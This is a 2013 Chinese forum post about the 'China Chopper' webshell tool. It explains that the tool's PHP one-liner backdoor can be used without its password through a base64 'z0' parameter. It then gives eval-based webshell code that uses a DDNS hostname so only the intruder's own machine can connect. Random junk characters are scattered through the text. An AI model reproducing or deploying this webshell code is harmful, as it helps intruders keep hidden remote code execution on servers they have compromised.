今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
$ O$ R" v3 Q: O4 G1 W! V0 [7 M# m% I( n# K' [
就算你设置了密码,使用了eval($_REQUEST['moyo']);# Q7 G& Y* J$ ^3 v. @2 J
6 |- X9 Q4 d, F/ ?5 r8 B
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
_! u! ]: E, V% `5 `+ g" G0 {
6 N) e! K' F h2 L+ [因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
3 g7 I0 I, A8 m$ p+ l- s# f- z
0 O$ ?2 \1 [6 e直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
, g2 l+ N3 Q% ]8 P( L
4 K$ A& e( o& v2 r6 U2 c* q* r/ {/ g不知道是设计缺陷还是故意留的后门7 l5 p# p+ Y# c; Y$ S+ ?, J# i$ _) {
1 p, u J! r( Q) j如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
$ S. X# Y$ V! r1 A
: R) X0 F1 ~0 S ]- p" ]% |4 N本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
' ~/ r5 |# H' i1 z4 {
, \3 ~8 ?# \+ ^& G2 |然后一句话后门这样写4 o6 V: N) j2 ]* o, J& {; ~
2 I& z; E, t/ |' V; ^<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
$ z( C( q) W9 L2 y这样就可以让一句话后门只允许自己的电脑连接了, g* R7 }( s, W) {6 ]/ b2 ?+ X
2 T# l$ @( ` Y- U+ G$ b
|
发表于 2013-7-26 12:45:48
收藏
支持
反对